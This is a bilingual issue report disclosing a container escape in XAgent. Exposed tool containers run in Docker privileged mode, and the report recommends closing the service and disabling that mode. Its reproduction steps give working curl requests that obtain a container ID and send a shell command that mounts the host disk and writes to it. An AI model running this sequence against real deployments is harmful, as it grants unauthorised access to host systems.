Docker Enabling Privileged Mode Causes Container Escapes

[ac0d3r]

Issue Description / 问题描述

Docker Enabling Privileged Mode Causes Container Escapes.

Steps to Reproduce / 复现步骤

1. Installation and startup XAgent

git clone https://github.com/OpenBMB/XAgent.git
docker-compose up -d

2. Creating Tool Containers

curl -v --request POST 'http://localhost:8080/get_cookie'
...
< HTTP/1.1 200 OK
...
< set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; Path=/; SameSite=lax
...

Extract container ID: set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx;

3. Execute malicious command escape container

curl --request POST 'http://localhost:8080/execute_tool' --header 'Cookie: node_id={{Container ID}}' --header 'Content-Type: application/json' --data \
'{
    "tool_name":"shell_command_executor",
    "arguments":{"command":"mkdir test; mount /dev/sda1 test; echo hello > test/hello.txt"}
}'

Expected Behavior / 预期行为

• Not expose the ToolServerManager service：

• Disabling Privileged Mode：https://github.com/OpenBMB/XAgent/blob/main/assets/config/manager.yml#L16

Environment / 环境信息

• Operating System / 操作系统：CentOS Linux 7.9
• Python Version / Python 版本：
• Other Relevant Information / 其他相关信息：

Error Screenshots or Logs / 错误截图或日志

If possible, please provide relevant screenshots or logs of the error. / 如果可能，请提供相关的错误截图或日志文件。

Additional Notes / 其他备注

If you have any additional information or notes, please add them here. / 如果有其他补充信息，请在此处添加。